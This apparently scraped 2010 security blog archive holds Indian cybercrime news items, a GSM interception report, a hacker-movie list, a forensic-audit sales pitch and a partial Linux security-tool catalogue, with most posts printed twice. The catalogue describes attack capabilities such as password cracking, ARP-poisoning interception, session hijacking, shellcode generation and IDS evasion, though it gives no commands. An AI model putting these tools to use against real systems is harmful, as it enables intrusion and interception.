A Cyber Crime Cell officer said, “Bilore was working with the insurance company for the last couple of years while Nirmale joined only recently. Nirmale’s meteoric rise in the organisation obviously did not go down well with Bilore, especially after he won the best employee award and was promoted to the post of assistant manager.”
In order to embarrass his colleague, Bilore allegedly created his fake profile on Orkut from his friend Changani’s computer,” said Chandrakant Joshi, senior police inspector of the Cyber Cell.
“The accused scrapped all his female employees in the organisation and also sent them vulgar messages. When the women cross-checked with Nirmale he clarified his stand and lodged a complaint,” Joshi added.
Nirmale’s father Balasaheb said, “My son was upset when his female colleagues complained to him about the lurid messages. He was doing well at work, which I think upset Bilore as he belonged to a rival clique.”
On investigating, the police discovered that the computer belonged to Changani who was then arrested. Changani then informed the police about Bilore’s involvement.
Both were booked under Information Technology Act and were let off on bail.
“Strict disciplinary action is being taken against the erring individual. We place high emphasis on ethical conduct in personal and professional dealings of employees and misdemeanors of any sort are not tolerated,” said Sugata Dutta, Head of Human Resources, Kotak Life Insurance.
There is nothing called healthy competition at the workplace. Especially if at stake is a coveted ‘best employee’ award, a promotion and the promise of a better life.
Allegedly driven by professional jealousy, an assistant manager with Kotak Life Insurance created a fake Orkut profile of his colleague with the intention of discrediting him. Thane’s Cyber Crime Cell arrested him and his associate on Tuesday after he used the social networking profile to send obscene messages to the female colleagues. The accused, Anand Ishwar Bilore, 21, and his associate, Vishal Changani, 23, an estate agent are from Chembur.
A Cyber Crime Cell officer said, “Bilore was working with the insurance company for the last couple of years while Nirmale joined only recently. Nirmale’s meteoric rise in the organisation obviously did not go down well with Bilore, especially after he won the best employee award and was promoted to the post of assistant manager.”
In order to embarrass his colleague, Bilore allegedly created his fake profile on Orkut from his friend Changani’s computer,” said Chandrakant Joshi, senior police inspector of the Cyber Cell.
“The accused scrapped all his female employees in the organisation and also sent them vulgar messages. When the women cross-checked with Nirmale he clarified his stand and lodged a complaint,” Joshi added.
Nirmale’s father Balasaheb said, “My son was upset when his female colleagues complained to him about the lurid messages. He was doing well at work, which I think upset Bilore as he belonged to a rival clique.”
On investigating, the police discovered that the computer belonged to Changani who was then arrested. Changani then informed the police about Bilore’s involvement.
Both were booked under Information Technology Act and were let off on bail.
“Strict disciplinary action is being taken against the erring individual. We place high emphasis on ethical conduct in personal and professional dealings of employees and misdemeanors of any sort are not tolerated,” said Sugata Dutta, Head of Human Resources, Kotak Life Insurance.
CYBER COPS CRACK RS 65K FRAUD
Duo hacks website, books int’l tickets
Mumbai: Two persons hacked into the website of an authorised travel agent of a domestic airline, causing a loss of more than Rs 65,000 to the latter. But their fraud was detected and they ended up in the police net.
The two hacked into the website of an Andheri travel agent of Indigo Airlines. They booked international tickets that caused a loss to Indigo Airlines to the tune of 65,152. However, the duo was nabbed by the cyber police on Tuesday. The two accused, who have been identified as Prashant Amarnarayan Jha (36) and Sudipkumar Sinha (30), have been booked on the charges of Information Technology Act of 2000 and have been remanded to police custody. While Jha is a resident of Nallasopara, Sinha is his associate and a resident of Marol in Andheri.
According to the police, the complaint was filed by one Arun Shetty who is the authorised ticket agent of Indigo Airlines having an office under the name of Ramkrishna Travels and Tours in Andheri.
Shetty was shocked recently when the airlines furnished him the extra bill for a few international tickets which he had not issued. During the course of investigations, it came to light that somebody had hacked into the website of the travel agent and issued two international air tickets. The cyber police traced the IP address to Nalasopara. The police raided Jha’s residence and arrested him.
Mumbai: Two persons hacked into the website of an authorised travel agent of a domestic airline, causing a loss of more than Rs 65,000 to the latter. But their fraud was detected and they ended up in the police net.
The two hacked into the website of an Andheri travel agent of Indigo Airlines. They booked international tickets that caused a loss to Indigo Airlines to the tune of 65,152. However, the duo was nabbed by the cyber police on Tuesday. The two accused, who have been identified as Prashant Amarnarayan Jha (36) and Sudipkumar Sinha (30), have been booked on the charges of Information Technology Act of 2000 and have been remanded to police custody. While Jha is a resident of Nallasopara, Sinha is his associate and a resident of Marol in Andheri.
According to the police, the complaint was filed by one Arun Shetty who is the authorised ticket agent of Indigo Airlines having an office under the name of Ramkrishna Travels and Tours in Andheri.
Shetty was shocked recently when the airlines furnished him the extra bill for a few international tickets which he had not issued. During the course of investigations, it came to light that somebody had hacked into the website of the travel agent and issued two international air tickets. The cyber police traced the IP address to Nalasopara. The police raided Jha’s residence and arrested him.
Tap mobiles with a $1,500 device now
A COMPUTER SECURITY RESEARCHER has built a device for just $1,500 that can intercept some kinds of cell phone calls and record everything that’s said.
The attack Chris Paget showed illustrates weaknesses in GSM, one of the world’s most widely-used cellular communications technologies. His attack was benign; he showed how he could intercept a few dozen calls made by fellow hackers in the audience for his talk at the Defcon conference here.
But it illustrates that criminals could do the same thing for malicious purposes, and that consumers have few options for protecting themselves.
Paget said he hopes his research helps spur adoption of newer communications standards that are more secure.
“GSM is broken — it’s just plain broken,” he said. GSM is considered 2G, or “second generation,” cellular technology. Phones that run on the newer 3G and 4G standards aren’t vulnerable to his attack.
If you’re using an iPhone or any other smart phone and the screen shows that your call is going over a 3G network, for example, you are protected. Blackberry phones apply encryption to calls that foil the attack, Paget pointed out.
But if you’re using a type of phone that doesn’t specify which type of network it uses, those phones are often vulnerable, Paget said. Paget’s device tricks nearby cell phones into believing it is a legitimate cell phone tower and routing their calls through it.
The attack Chris Paget showed illustrates weaknesses in GSM, one of the world’s most widely-used cellular communications technologies. His attack was benign; he showed how he could intercept a few dozen calls made by fellow hackers in the audience for his talk at the Defcon conference here.
But it illustrates that criminals could do the same thing for malicious purposes, and that consumers have few options for protecting themselves.
Paget said he hopes his research helps spur adoption of newer communications standards that are more secure.
“GSM is broken — it’s just plain broken,” he said. GSM is considered 2G, or “second generation,” cellular technology. Phones that run on the newer 3G and 4G standards aren’t vulnerable to his attack.
If you’re using an iPhone or any other smart phone and the screen shows that your call is going over a 3G network, for example, you are protected. Blackberry phones apply encryption to calls that foil the attack, Paget pointed out.
But if you’re using a type of phone that doesn’t specify which type of network it uses, those phones are often vulnerable, Paget said. Paget’s device tricks nearby cell phones into believing it is a legitimate cell phone tower and routing their calls through it.
Man arrested for mailing ex-colleague’s ‘lewd’ pics Mumbai:
Mumbai: The cyber crime cell of Mumbai police on Wednesday arrested a 23-yearold executive working for a multinational company in Andheri for allegedly hacking into his ex-colleague’s email ID and sending morphed obscene pictures of her to her friends.
The accused, Prashant Vilas Desai, was arrested after the police tracked down the IP address to his laptop. “We have booked Desai on charges of cheating, breach of trust and Sections of the Information Technology Act. He has been remanded in police custody,’’ said a cyber crime cell official.
The 22-year-old victim worked as an administrative assistant with the same company where Desai was employed. Desai was attracted to her. Though she treated him like a friend, Desai mistook her actions and approached her parents with a marriage proposal, the official added.
The victim’s parents turned his proposal down. Soon after, he allegedly started stalking her. He would call her repeatedly and send her emails. “She left that organization and joined another company as sales coordinator. On May 26, Desai called her mother up and told her that she was sending him emails expressing her love for him. Later, he even showed her mother printouts. The victim’s mother told her to close the email account and start a fresh one,’’ the officer said.
“On June 21, some of her friends informed the victim that someone had sent obscene pictures of her from her email, giving out her details and phone number. When the victim logged into her account, she was shocked to see the emails,’’ the officer said.
The accused, Prashant Vilas Desai, was arrested after the police tracked down the IP address to his laptop. “We have booked Desai on charges of cheating, breach of trust and Sections of the Information Technology Act. He has been remanded in police custody,’’ said a cyber crime cell official.
The 22-year-old victim worked as an administrative assistant with the same company where Desai was employed. Desai was attracted to her. Though she treated him like a friend, Desai mistook her actions and approached her parents with a marriage proposal, the official added.
The victim’s parents turned his proposal down. Soon after, he allegedly started stalking her. He would call her repeatedly and send her emails. “She left that organization and joined another company as sales coordinator. On May 26, Desai called her mother up and told her that she was sending him emails expressing her love for him. Later, he even showed her mother printouts. The victim’s mother told her to close the email account and start a fresh one,’’ the officer said.
“On June 21, some of her friends informed the victim that someone had sent obscene pictures of her from her email, giving out her details and phone number. When the victim logged into her account, she was shocked to see the emails,’’ the officer said.
Sunday, November 7, 2010
Friday, November 5, 2010
My Favorite Hacker Movies
Hacker living in Russia, gets tied into the mafia.
Takedown
Avoid at all cost. It's a piss poor movie and full of lies. Look up "Freedom Downtime", a documentary on the 'Free Kevin' movement. You'll quickly understand.
Untraceable
quite a talented hackers movie......... thrilling. also shows the ways of FBI cybercrime tracking the target site
Serial Experiments: Lane
13 part japanese anime series made for T.V. More about philosophy and conspiracy theory than hacking, but everything revolves around computers and the internet
Code Hunter
Low budget flick with hacking, VR and AI. Preposterous but still enjoyable.
Die Hard 4
This very good Hacking Based movi.I am very impressed this movi and i want also became hacker
Cloak and Dagger
A classic! I watched this several times as a kid. War Games is still number 1 though.http://www.blogger.com/img/blank.gif
The Bourne Ultimatum
The CIA needs to hack the mail server of a newspaper (The Guardian UK) to read the email of a reporter they assassinated. So they turn to Nmap and Zenmap GUI to hack the mail server.
The Girl with the Dragon Tattoo
Based on the internationally bestselling novel by Stieg Larsson, this film follows Lisabeth, a troubled young hacker suffering from Asperger syndrome and a history of abuse by authority figures, as she works with a journalist trying to solve a 40-year old murder mystery.
Khottabych
A teenage hacker (Gena) uses Nmap and Telnet to deface microsoft.com. Microsoft and the US authorities are understandably upset by the attack, so they send the attractive female hacker Annie to flush him out. The movie also features an epic battle between powerful genies (the kind which come in a bottle) fighting for dominion over Earth.
The Listening
A former NSA officer who defects and mounts a clandestine counter-listening station high in the Italian Alps. Nmap and NmapFE can be seen in action.
Battle Royale
One of the students is a hacker, and can be seen referencing Nmap source code.
Hackers
Perhaps this is not a good movie if you're a real hacker but personally i thought it was awesome!
Cypher
I suppose I would add the movie Cypher as a notable mention. It's a decent sci-fi flick with what was supposed to be The Matrix influences. No hacking per see, except loading virii.
Takedown
Avoid at all cost. It's a piss poor movie and full of lies. Look up "Freedom Downtime", a documentary on the 'Free Kevin' movement. You'll quickly understand.
Untraceable
quite a talented hackers movie......... thrilling. also shows the ways of FBI cybercrime tracking the target site
Serial Experiments: Lane
13 part japanese anime series made for T.V. More about philosophy and conspiracy theory than hacking, but everything revolves around computers and the internet
Code Hunter
Low budget flick with hacking, VR and AI. Preposterous but still enjoyable.
Die Hard 4
This very good Hacking Based movi.I am very impressed this movi and i want also became hacker
Cloak and Dagger
A classic! I watched this several times as a kid. War Games is still number 1 though.http://www.blogger.com/img/blank.gif
The Bourne Ultimatum
The CIA needs to hack the mail server of a newspaper (The Guardian UK) to read the email of a reporter they assassinated. So they turn to Nmap and Zenmap GUI to hack the mail server.
The Girl with the Dragon Tattoo
Based on the internationally bestselling novel by Stieg Larsson, this film follows Lisabeth, a troubled young hacker suffering from Asperger syndrome and a history of abuse by authority figures, as she works with a journalist trying to solve a 40-year old murder mystery.
Khottabych
A teenage hacker (Gena) uses Nmap and Telnet to deface microsoft.com. Microsoft and the US authorities are understandably upset by the attack, so they send the attractive female hacker Annie to flush him out. The movie also features an epic battle between powerful genies (the kind which come in a bottle) fighting for dominion over Earth.
The Listening
A former NSA officer who defects and mounts a clandestine counter-listening station high in the Italian Alps. Nmap and NmapFE can be seen in action.
Battle Royale
One of the students is a hacker, and can be seen referencing Nmap source code.
Hackers
Perhaps this is not a good movie if you're a real hacker but personally i thought it was awesome!
Cypher
I suppose I would add the movie Cypher as a notable mention. It's a decent sci-fi flick with what was supposed to be The Matrix influences. No hacking per see, except loading virii.
Tuesday, November 2, 2010
Friday, October 29, 2010
Corporate Digital Forensic Audits
With the prevalence of companies providing employees with mobile phones & computers, there may be a possibility that misuse of the equipment may create additional costs to the employer. Examples of these may be:
• Using hand-held devices to access the internet and email, for personal use and time-wasting, during working hours. This may involve accessing social networking websites, such as Facebook, or monitoring online auctions on sites such as Ebay.
• They may be viewing or/and downloading inappropriate material, images or videos using a computer or hand-held device.
• Downloading pirated media files and software.
• Receiving an unacceptable quantity of personal telephone calls and text messages via mobile phone. These will not be displayed on the phone bill.
• Removing sensitive company data from the workplace using the digital device.
• Bullying or using unacceptable language within generated emails and text messages.
All of the above examples can bear a financial cost for the organisation as well as a possible negative effect on company reputation and credibility:
• If an employee was caught by relevant authorities downloading illegal software, for example, then the company could suffer bad publicity and loss of credibility in the marketplace.
• If an individual was caught downloading illegal pornographic images on a company hand-held device or computer then there is a strong possibility that law enforcement would confiscate all company digital equipment for forensic analysis. This would cause possible temporary business closure and bad publicity along with loss of business and reputation.
• Distractions and time-wasting by web-surfing, spending time in chat rooms, online social networking, watching streaming video and emailing.
• Excessive mobile phone bills by unreasonable amount of personal calls and text messages.
Forensics can provide a regular audit of digital devices that would help reduce company operating costs and help preserve company reputation. We provide a spot-checking service to companies to:
• Help control costs and increase productivity.
• Reduce time-wasting.
• Improve computer security – illegal downloading can often attract malware and viruses and therefore compromise company security and increase downtime.
• Help preserve company reputation and business continuity.
To enable this process our recommendation is that a spot-check of devices is carried out by us, rather than an analysis of all equipment which would prove expensive and impractical. The number of devices analysed would be relative to the size of the business. For example, for a business with, say, 12 mobile phones and 8 laptops we could analyse 2 phones and 1 laptop for instance, but there is no hard and set rule for this. We would produce a forensic report for each device after analysis. The forensic equipment we use is equal to some of that used by law enforcement agencies and we work to the Association of Chief Police Officers Guidelines with regard to laboratory procedures, handling of evidence, audit trails and report generation.
What is particularly important is that the company employees are fully aware that an audit of devices is being carried out and that it will happen again in the near future.
• This will make employees more vigilant and less likely to misuse company equipment.
• There should be a reduction in phone bills, in particularly for the staff that are possibly making excessive personal communications.
The fact that an audit process, that appears random to employees, is being carried out periodically should help regulate use of company computers and hand-held devices. The fear of being “found out” may make employees think twice about how they use equipment, maintain focus on work and reduce distractions. We recommend that audits are carried out at least once a year and that they are not done on the same date each year to help increase the element of surprise.
• Using hand-held devices to access the internet and email, for personal use and time-wasting, during working hours. This may involve accessing social networking websites, such as Facebook, or monitoring online auctions on sites such as Ebay.
• They may be viewing or/and downloading inappropriate material, images or videos using a computer or hand-held device.
• Downloading pirated media files and software.
• Receiving an unacceptable quantity of personal telephone calls and text messages via mobile phone. These will not be displayed on the phone bill.
• Removing sensitive company data from the workplace using the digital device.
• Bullying or using unacceptable language within generated emails and text messages.
All of the above examples can bear a financial cost for the organisation as well as a possible negative effect on company reputation and credibility:
• If an employee was caught by relevant authorities downloading illegal software, for example, then the company could suffer bad publicity and loss of credibility in the marketplace.
• If an individual was caught downloading illegal pornographic images on a company hand-held device or computer then there is a strong possibility that law enforcement would confiscate all company digital equipment for forensic analysis. This would cause possible temporary business closure and bad publicity along with loss of business and reputation.
• Distractions and time-wasting by web-surfing, spending time in chat rooms, online social networking, watching streaming video and emailing.
• Excessive mobile phone bills by unreasonable amount of personal calls and text messages.
Forensics can provide a regular audit of digital devices that would help reduce company operating costs and help preserve company reputation. We provide a spot-checking service to companies to:
• Help control costs and increase productivity.
• Reduce time-wasting.
• Improve computer security – illegal downloading can often attract malware and viruses and therefore compromise company security and increase downtime.
• Help preserve company reputation and business continuity.
To enable this process our recommendation is that a spot-check of devices is carried out by us, rather than an analysis of all equipment which would prove expensive and impractical. The number of devices analysed would be relative to the size of the business. For example, for a business with, say, 12 mobile phones and 8 laptops we could analyse 2 phones and 1 laptop for instance, but there is no hard and set rule for this. We would produce a forensic report for each device after analysis. The forensic equipment we use is equal to some of that used by law enforcement agencies and we work to the Association of Chief Police Officers Guidelines with regard to laboratory procedures, handling of evidence, audit trails and report generation.
What is particularly important is that the company employees are fully aware that an audit of devices is being carried out and that it will happen again in the near future.
• This will make employees more vigilant and less likely to misuse company equipment.
• There should be a reduction in phone bills, in particularly for the staff that are possibly making excessive personal communications.
The fact that an audit process, that appears random to employees, is being carried out periodically should help regulate use of company computers and hand-held devices. The fear of being “found out” may make employees think twice about how they use equipment, maintain focus on work and reduce distractions. We recommend that audits are carried out at least once a year and that they are not done on the same date each year to help increase the element of surprise.
Tuesday, August 31, 2010
Linux needed tools
Linux ToolsADMsnmp – SNMP audit scanner
aide – AIDE (Advanced Intrusion Detection Environment) is a free replacement for Tripwire(tm). It generates a database that can be used to check the integrity of files on server. It uses regular expressions for determening which files get added to the database. You can use several message digest algorithms to ensure that the files have not been tampered with.
aisnort – Airsnort is a tool for wireless lans which recovers encryption keys by passively monitoring transmissions, computing the encryption key when enough packets have been gathered. Works on both 40 and 128 bit encryption. Many weaknesses in the WEP 802.11 protocol are discussed here. AirSnort is the first publicly available implementation of this attack. Once enough packets have been gathered, AirSnort can guess the encryption password in under a second.
amap – Amap is a scanning tool that allows you to identify the applications that are running on (a) specific port(s). It does this by connecting to the port(s) and sending trigger packets. These trigger packets will typically be an application protocol handshake (i.e. SSL). Amap then looks up the response in a list and prints out any match it finds. Adding new response identifications can be done just by adding them to an easy-to-read text file. With amap, you will be able to identify that SSL server running on port 3445 and some oracle listener on port 233!
argus-client & argus server – Argus is a generic IP network transaction auditing tool; it enables a site to generate comprehensive network transaction audit logs, allowing user to perform extensive analysis of network traffic.
arpd – rarpd v1.0 is a Reverse Address Resolution Protocol Daemon. rarpd listens on the ethernet for broadcast packets asking for reverse address resolution. These packets are sent by hosts at boot time to find out their IP address.
arping – Arping is an arp level ping utility which broadcasts a who-has ARP packet on the network and prints answers. Very useful when you are trying to pick an unused IP for a net that you don’t yet have routing to.
arpwatch – Arpwatch is a tool that monitors ethernet activity and keeps a database of ethernet/ip address pairings. It also reports certain changes via email. Arpwatch requires tcpdump and libpcap. Includes FDDI support, updated ethercodes, uses autoconf.
autopsy – The Autopsy Forensic Browser is an HTML-based graphical interface to The [at]stake Sleuth Kit (TASK). Together, TASK and Autopsy Forensic Browser are an open source alternative to the common Windows-based digital forensic tools. Autopsy provides an investigator with an HTML-based graphical interface that allows one to browse images from compromised systems in a “File Manager”-like interface. Windows and UNIX file systems can be analyzed to view deleted files, create time lines of file activity, and perform key word searches.
babelweb – Babelweb is a program which allows to automate tests on a HTTP server. It is able to follow the links and the HTTP redirect but it is programmed to remain on the original server.
bfbtester – BFBTester is a utility for doing quick, proactive security checks of binary programs by performing checks of single and multiple argument command line overflows and environment variable overflows. It will also watch for tempfile creation activity to alert the user of any programs using unsafe tempfile names. While BFBTester can not test all overflows in software, it is useful for detecting initial mistakes that can red flag dangerous software.
biew – Biew is Binary vIEWer with built-in editor for binary, hexadecimal and disassembler modes. It contains a PentiumIII/K7Athlon/Cyrix-M2 disassembler, full preview of MZ, NE, PE, LE, LX, DOS.SYS, NLM, arch, ELF, a.out, coff32, PharLap, and rdoff executable formats, a code guider, a text viewer with russian codepages support, and many other features.
bing – Bandwidth
Ping. Estimates bandwidths between network hosts and routers.
cabextract – a program to extract Microsoft cabinet (.CAB) files.
cflow – Reads and analyzes flow files
cheops – Cheops is a network “swiss army knife”. It’s a combination of a variety of network tools to provide system adminstrators and users with a simple interface to managing and accessing their networks. Cheops aims to do for the network what the file manager did for the filesystem. Features include: Network mapping via UDP and/or ICMP packets, port detection using half-open tcp connections (ala halfscan), OS detection using invalid flags on TCP packets (ala queso), Domain scans, ICMP pings, much more.
chkrootkit – checks for signs of a rootkit. Includes ifpromisc.c to check and see if the interface is in promisc mode, chklastlog.c to check lastlog for deletions, and chkwtmp.c to check wtmp for deletions. Tested on Linux 2.0.x, 2.2.x and FreeBSD 2.2.x, 3.x and 4.0. Changes: lrk5 detection, Sun/Solaris support, and Red Hat fixes.
chntpw – NT SAM password recovery utility
cmospwd – CmosPwd decrypts password stored in cmos used to access BIOS SETUP
cracklib2 – A pro-active password checker library
cryptcat – Cryptcat is an encrypted version of netcat. It uses AES encryption and a static key to encrypt all transactions. Previous versions had a flaw in which not all network traffic was encrypted so this is the patched version.
darkstat – Darkstat is an ntop-workalike network statistics gatherer. Built to be faster and smaller than ntop, it uses libpcap to capture network traffic and serves up Web page reports of statistics such as data transferred by host, port, and protocol. It also has a neat bandwidth usage graph.
dcetest – tool which probes a windows machine over TCP port 135, MSRPC endpoint information. It can be though of as the equivalent of rpcinfo -p against a Windows box. Dcetest can also be very useful once inside a DMZ to fingerprint Windows machines on the network.
dcfldd – Enhanced DD imager with built in hashing. Works like dd from command line.
dd_rescue – Like dd, dd_rescue does copy data from one file or block device to another. You can specify file positions (called seek and Skip in dd).
dlint – Dlint analyzes any DNS zone you specify and reports any problems it finds by displaying errors and warnings. Then it descends recursively to examine all zones below the given one (this can be disabled with a command-line option).
dnswalk – dnswalk is a DNS database debugger. It works by initiating a zone transfer of a current zone, inspecting individual records for inconsistencies with other data, and generating warnings and errors. It is not a parser of DNS datafiles, it works strictly via existing DNS query methods on a “live” system (however dnswalk can be run on a separate nameserver which has data ready to move into production).
driftnet – Driftnet is a program which sniffs network traffic and picks out images from TCP streams it observes. It is interesting to run it on a host which sees a lot of web traffic. Changes: This release fixes problems with building in adjunct-only mode. There are performance enhancements.
dsniff – dsniff is a suite of utilities that are useful for penetration testing. It consists of the following programs: arpredirect intercepts packets from a target host on the LAN intended for another host on the LAN by forging ARP replies. findgw determines the local gateway of an unknown network via passive sniffing. macof floods the local network with random MAC addresses. tcpkill kills specified in-progress TCP connections. dsniff is a simple password sniffer which handles many protocols. mailsnarf outputs all messages sniffed from SMTP traffic in Berkeley mbox format. webspy sends URLs sniffed from a client to your local Netscape browser for display, updated in real-time. Changes: Added parsing for Napster, AIM, ICQ (v2, v5), and CVS pserver. Now supports more non-glibc Linux systems missing ether_ntoa(). Unique HTTP authentication information by directory is now supported. dsniff now skips IMAP command tag, and doesn’t rely on /etc/services.
echoping – echoping is a small program to approximatively test the performance of a remote host by sending it TCP “echo” packets. It is able to use the following protocols: echo, discard, chargen, HTTP (with SSL if you wish), ICP, and SMTP. It uses UDP instead of TCP for the protocols which accept it (like echo), it can repeat the test and display various statistics, and it can use T/TCP on systems which support it. Changes: SSL (Secure Sockets Layer) support, and a new ability to read many bytes at a time for a big performance improvement.
etherape – Etherape is an etherman clone which displays network activity graphically. Active hosts are shown as circles of varying size, and traffic among them is shown as lines of varying width. It is GNOME and pcap based. Changes: Much better now.
ethereal – Ethereal is a GTK+-based network protocol sniffer / analyzer
ettercap – Ettercap is a network sniffer/interceptor/logger for switched LANs. It uses ARP poisoning and the man-in-the-middle technique to sniff all the connections between two hosts. Features character injection in an established connection – you can inject characters to server (emulating commands) or to client (emulating replies) while maintaining the connection alive! Integrated into a easy-to-use and powerful ncurses interface.
farpd – Fake ARP user space daemon. This ARP daemon replies to any ARP request for a set of IP addresses with the hardware MAC address of one of the interfaces of the server after determining that no other host in the network is claiming that IP.
fatback – Analyze and recover deleted FAT files from Linux
fenris – Fenris is a multipurpose tracer, stateful analyzer and partial decompiler intended to simplify bug tracking, security audits, code, algorithm, protocol analysis and computer forensics by providing a structural program trace, general information about internal constructions, execution path, memory operations, I/O, conditional expression info, and much more.
flawfinder – Flawfinder searches through source code for potential security flaws, listing potential security flaws sorted by risk, with the most potentially dangerous flaws shown first. This risk level depends not only on the function, but on the values of the parameters of the function.
fping – Fping is a ping(1) like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up. fping is different from ping in that you can specify any number of hosts on the command line, or specify a file containing the lists of hosts to ping. Instead of trying one host until it timeouts or replies, fping will send out a ping packet and move on to the next host in a round-robin fashion. If a host replies, it is noted and removed from the list of hosts to check. If a host does not respond within a certain time limit and/or retry limit it will be considered unreachable. Unlike ping, fping is meant to be used in scripts and its output is easy to parse.
fragroute – Fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host, implementing most of the attacks described in the Secure Networks “Insertion, Evasion, and Denial of Service: Eluding Network Intrusion Detection” paper of January 1998. It features a simple ruleset language to delay, duplicate, drop, fragment, overlap, print, reorder, segment, source-route, or otherwise monkey with all outbound packets destined for a target host, with minimal support for randomized or probabilistic behavior. Includes scripts to defeat even the current CVS snort IDS.
freeswan – Linux FreeS/WAN provides IPSEC (IP Security, which is both encryption and authentication) kernel extensions and an IKE (Internet Key Exchange, keying and encrypted routing daemon) as well as various rc scripts and documentation. This lets a bright Linux sysadmin build VPN’s gateways out of even old 584 and 486 PC Clone boxes. The 1.00 version is known to inter-operate with other IPSEC and IKE system already deployed by other vendors such as OpenBSD.
gdb – the GNU Project debugger, allows you to see what is going on `inside’ another program while it executes — or what another program was doing at the moment it crashed.
gnupg – GnuPG is a complete and free replacement for PGP. Because it does not use IDEA or RSA it can be used without any restrictions. GnuPG is a RFC2440 (OpenPGP) compliant application.
grenzgaenger – SOCKS-like hacker tool for tunneling nmap, netcat and exploits transparently through systems into protected networks
gtkrecover – gtkrecover is a GUI for recover, a program that undeletes files on ext2 partitions. You can search for a deleted files.
hackbot – host exploration tool and banner grabber. It scans hosts for FTP banners, SSH banners, Open Relays, EXPN and VRFY options, more than 200 common CGI vulnerabilities and common indexable directories, NT unicode vulnerabilities and NT nimda infections.
hammerhead – A stress testing tool designed to test out your web server and web site. It can initiate multiple connections from IP aliases and simulated numerous (256+) users at any given time. The rate at which Hammerhead attempts to pound your site is fully configurable, there are numerous other options for trying to create problems with a web site (so you can fix them).
hellkit – Hellkit is a shellcode generator. You write the your shellcode in C, and it gets converted to ASM for use with both heap and stack based overflows. Many examples included. Changes: Added generic shellcode decoder which can handle shellcode up to 64kb in length containing any bytes, added encoder for this type of decoder, and fixed some signedness issues in array accessment.
hjksuite – collection of programs for hijacking. First of all it contains hjklib, a library for hijacking. It contains also some programs like hjkbnc which allows irc hijackinig directly with your client, hjkhttpd for hijacking HTTP sessions, and hjknetcat, for hijacking text connections.
hping2 – Hping is a software to do TCP/IP stack auditing, to uncover firewall policy, to scan TCP port in a lot of different modes, to transfer files accross a firewall, test network performance, test of TOS is handled, etc.
httptunnel – httptunnel creates a bidirectional data channel through an HTTP proxy, from your isolated computer behind a restrictive firewall, to a system on the Internet you have access to.
httpush – HTTPush aims at providing an easy way to audit HTTP and HTTPS application/server security. It supports on-the-fly request modification, automated decission making and vulnerability detection through the use of plugins and full reporting capabilities.
hunt – Hunt is a tool for exploiting well known weaknesses in TCP/IP protocol. Use primarily to hijack connections, but has many other features.
hydra – the world’s first parallel login hacker. With this tool you are able to attack several services at once.
icmpinfo – Tracks ICMP packets, allowing you to proactively watch for suspicious behaviour, mainly ICMP unreachables.
icmpush – program that sends icmp error packets and obtains remote info throught icmp packets. Supports spoof and broadcasting. This new release supports the following ICMP error types: Unreach, Parameter Problem, Redirect and Source Quench; ICMP information types: Timestamp, Address Mask Request, Information Request, Router Solicitation (Router Discovery), Router Advertisement (Router Discovery) and Echo Request. This program features an excellent interface with a wide number of options (flags) and values. As an added bonus, Slayer has included a mini-script called try_reset that tries to reset existing telnet or rlogin connections. Your security auditing toolkit is not complete without this program! One of the few 5-star programs.
idswakeup – idswakeup is a Bourne shell script invoking hping2 (required) and iwu (part of this package) to generate false alarms in order to check if a network intrusion detection system works all right.
ipchains – ipchains-firewall is an easily-configurable shell script to establish masquerading and firewalling rules using ipchains.
iproute – professional set of tools to control the networking behavior in kernels 2.2.x and later.
ipsorc – TCPIP packet generator which allows you to send TCP, UDP, and ICMP packets with a GTK+ interface.
iptraf – ncurses-based IP LAN monitor that generates various network statistics including TCP info, UDP counts, ICMP and OSPF information, Ethernet load info, node stats, IP checksum errors, and others.
iputils-ping – Tools to test the reachability of network hosts
irpas – Internetwork Routing Protocol Attack Suite, a collection of programs used for advanced network operations, testing, and debugging.
isic – Crafts random packets and launches them. Can fix or randomize source/dest IP’s and Ports. You can specify the percentage of packets to fragment, to have IP options, to have bad IP versions…. Just about every field can be automagically twiddled. It contains distinct programs for TCP, UDP, ICMP, IP with a randomized protocol field and a program for randomized raw ethernet frames.
isnprober – tool that samples TCP Initial Sequence Numbers and can use that information to determine if a set of IP addresses belong to the same TCP/IP stack (machine) or not.
itunnel – ICMP tunneling tool
john – John the Ripper v1.6 (UNIX — source distribution) – High quality UNIX password cracker, probably the fastest available. New Features: Batch mode, Kerberos AFS passwords support, WinNT passwords support, Idle priority support on Linux, Rule reject flags: can reject entire rules on condition, New utility: ‘unique’ (removes duplicated lines without re-ordering), New options: ‘-stdout’, ‘-status’.
kismet – 802.11b wireless network sniffer. It is capable of sniffing using almost any wireless card supported in Linux, which currently divide into cards handled by libpcap and the Linux-Wireless extensions (such as Cisco Aironet), and cards supported by the Wlan-NG project which use the Prism/2 chipset (such as Linksys, Dlink, and Zoom). Features Multiple packet capture sources, Runtime network sorting by AP MAC address (bssid), IP block detection via ARP and DHCP packet dissection, Cisco product detection via CDP, Ethereal and tcpdump compatible file logging, Airsnort-compatible “interesting” (cryptographically weak) logging, and Secure SUID behavior.
l2tpd – the Layer 2 Tunnelling Protocol Daemon
lcrzoex – toolbox for network administrators and network hackers. Lcrzoex contains over 200 functionalities using network library lcrzo. For example, one can use it to sniff, spoof, create clients/servers, create decode and display packets, etc. The Ethernet, IP, UDP, TCP, ICMP, ARP and RARP protocols are supported.
lde – disk editor for linux, originally written to help recover deleted files.
login_hacker – THC Modem Login Hacker – A tool that will attempt to break into modem dialups using scripts written for minicom. Extremely configurable and a must have for any penetration test.
lsof – Lsof is a Unix-specific diagnostic tool. Its name stands for LiSt Open Files, and it does just that. It lists information about any files that are open by processes currently running on the system.
ltrace – debugging program which runs a specified command until it exits. While the command is executing, ltrace intercepts and records the dynamic library calls which are called by the executed process and the signals received by that process. It can also intercept and print the system calls executed by the program.
mac-robber – a forensics and incident response program that collects Modified, Access, and Change (MAC) times from files. Its output can be used as input to the ‘mactime’ tool in The [at]stake Sleuth Kit (TASK) to make a time line of file activity. mac-robber is similar to running the ‘grave-robber’ tool from The Coroner’s Toolkit with the ‘-m’ flag, except this is written in C and not Perl.
macchanger – MAC Changer is a utility for viewing/manipulating the MAC addresses of network interfaces which can set specific, random, vendor-based (with a 6000+ vendor list) and device-type-based MACs.
manipulate_data – Search data on a harddisk/partition/file, extract the part you are interested in, and write it back after you (maybe) modified it.
md5deep – cross-platform program to compute MD5 message digests on an arbitrary number of files.
